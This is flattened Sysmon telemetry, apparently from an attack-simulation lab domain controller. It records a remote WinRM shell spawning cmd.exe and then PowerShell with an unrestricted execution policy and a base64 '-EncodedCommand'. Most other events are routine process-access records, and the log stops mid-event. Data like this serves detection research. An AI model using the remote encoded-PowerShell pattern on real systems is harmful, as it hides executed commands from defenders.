13:10:22.086{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-42BE-6000-8900-000000009A01}4876C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002908Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:22.086{08A6967A-42BE-6000-8800-000000009A01}48604864C:\Windows\system32\cmd.exe{08A6967A-42BE-6000-8900-000000009A01}4876C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002907Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:22.090{08A6967A-42BE-6000-8900-000000009A01}4876C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUAC:\Users\Administrator\ATTACKRANGE\Administrator{08A6967A-42BD-6000-A1E0-080000000000}0x8e0a10HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{08A6967A-42BE-6000-8800-000000009A01}4860C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUA 10341000x80000000000000002906Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:22.086{08A6967A-42BD-6000-8700-000000009A01}47924812C:\Windows\system32\conhost.exe{08A6967A-42BE-6000-8800-000000009A01}4860C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002905Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:22.070{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002904Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:22.070{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002903Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:22.070{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002902Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:22.070{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002901Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:22.070{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002900Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:22.070{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002899Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:22.070{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002898Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:22.070{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002897Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:22.070{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-42BE-6000-8800-000000009A01}4860C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002896Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:22.070{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002895Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:22.070{08A6967A-42BD-6000-8600-000000009A01}47804836C:\Windows\system32\WinrsHost.exe{08A6967A-42BE-6000-8800-000000009A01}4860C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\WinrsHost.exe+2c94|C:\Windows\system32\WinrsHost.exe+2eb1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b 154100x80000000000000002894Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:22.083{08A6967A-42BE-6000-8800-000000009A01}4860C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUAC:\Users\Administrator\ATTACKRANGE\Administrator{08A6967A-42BD-6000-A1E0-080000000000}0x8e0a10HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{08A6967A-42BD-6000-8600-000000009A01}4780C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 10341000x80000000000000002893Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:22.070{08A6967A-4286-6000-0B00-000000009A01}852900C:\Windows\system32\lsass.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002892Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:22.070{08A6967A-4286-6000-0B00-000000009A01}852900C:\Windows\system32\lsass.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002891Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:22.070{08A6967A-4286-6000-0B00-000000009A01}852900C:\Windows\system32\lsass.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002890Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:22.039{08A6967A-4288-6000-1500-000000009A01}13241440C:\Windows\system32\svchost.exe{08A6967A-42BD-6000-8600-000000009A01}4780C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x80000000000000002889Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:22.023{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-42BD-6000-8600-000000009A01}4780C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003003Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:23.195{08A6967A-4286-6000-0B00-000000009A01}852900C:\Windows\system32\lsass.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003002Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:23.195{08A6967A-4286-6000-0B00-000000009A01}852900C:\Windows\system32\lsass.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003001Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:23.195{08A6967A-4286-6000-0B00-000000009A01}852900C:\Windows\system32\lsass.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003000Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:23.164{08A6967A-4286-6000-0B00-000000009A01}852900C:\Windows\system32\lsass.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002999Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 